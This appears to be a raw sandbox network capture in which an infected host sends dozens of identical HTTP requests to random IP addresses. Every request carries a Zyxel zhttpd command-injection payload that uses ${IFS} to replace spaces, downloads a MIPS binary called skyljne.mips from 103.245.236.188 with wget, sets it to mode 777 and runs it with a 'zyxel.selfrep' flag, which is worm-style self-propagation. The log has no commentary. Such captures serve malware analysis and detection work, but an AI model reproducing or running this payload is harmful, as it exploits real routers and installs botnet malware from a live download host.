                                                Jan 12, 2024 18:24:46.106115103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6931192.168.2.1356484105.121.171.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106188059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6932192.168.2.13567225.90.99.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106209993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6933192.168.2.134088432.200.3.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106260061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6934192.168.2.133463460.39.226.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106293917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6935192.168.2.1340084174.26.93.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106339931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6936192.168.2.133967065.78.60.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106385946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6937192.168.2.135997684.249.174.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106401920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6938192.168.2.133653270.205.93.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106456995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6939192.168.2.1348864143.2.254.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106488943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6940192.168.2.1338736191.155.58.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106554031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6941192.168.2.133350269.102.66.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106573105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6942192.168.2.1343914193.2.204.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106622934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6943192.168.2.1340122128.109.116.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106646061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6944192.168.2.1343324132.20.6.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106679916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6945192.168.2.1345384138.177.169.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106728077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6946192.168.2.134096671.118.78.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106765032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6947192.168.2.1340020136.36.101.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106816053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6948192.168.2.1347742186.214.175.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106842995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6949192.168.2.1344322179.253.182.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106885910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6950192.168.2.1358444147.156.219.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106934071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6951192.168.2.1347906138.41.5.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.106972933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6952192.168.2.1353910186.102.231.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107002020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6953192.168.2.1348378200.74.83.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107034922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6954192.168.2.134179467.56.39.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107065916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6955192.168.2.135093225.161.82.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107117891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6956192.168.2.1344058158.171.253.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107153893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6957192.168.2.1337446150.253.3.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107203007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6958192.168.2.1350180159.32.126.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107229948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6959192.168.2.135981644.71.39.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107254028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6960192.168.2.134323445.194.92.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107310057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6961192.168.2.1350656195.255.105.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107346058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6962192.168.2.1341254173.177.69.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107403994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6963192.168.2.134540281.142.175.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107450008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6964192.168.2.13363988.53.140.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107474089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6965192.168.2.133629012.18.80.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107522011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6966192.168.2.1352338197.196.77.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107567072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6967192.168.2.1349064150.45.73.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107599020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6968192.168.2.133409645.34.184.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107645988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6969192.168.2.1334466168.25.69.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107678890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6970192.168.2.135535277.41.7.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107708931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6971192.168.2.1334108218.220.9.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107744932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6972192.168.2.1333946107.51.60.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107789040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6973192.168.2.136018685.31.46.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107821941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6974192.168.2.13581865.108.216.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107858896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6975192.168.2.134903019.120.225.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107908010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6976192.168.2.1344016192.234.94.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107933044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6977192.168.2.1347792219.244.149.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.107985973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6978192.168.2.1339846109.56.84.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108012915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6979192.168.2.1348372154.109.180.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108072042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6980192.168.2.1348222171.84.17.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108097076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6981192.168.2.134388818.254.180.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108144999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6982192.168.2.134245057.43.74.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108174086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6983192.168.2.13580181.171.12.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108220100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6984192.168.2.135734464.124.220.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108253002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6985192.168.2.1351530164.31.216.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108297110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6986192.168.2.133996259.109.115.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108342886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6987192.168.2.1344762211.161.222.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108388901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6988192.168.2.1337944102.236.136.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108428955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6989192.168.2.1354174130.87.91.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108459949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6990192.168.2.1342694213.100.144.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108501911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6991192.168.2.1340602199.55.46.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108531952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6992192.168.2.135250037.146.30.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:46.108578920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6993192.168.2.1347250120.62.182.216443
                                                TimestampBytes transferredDirectionData
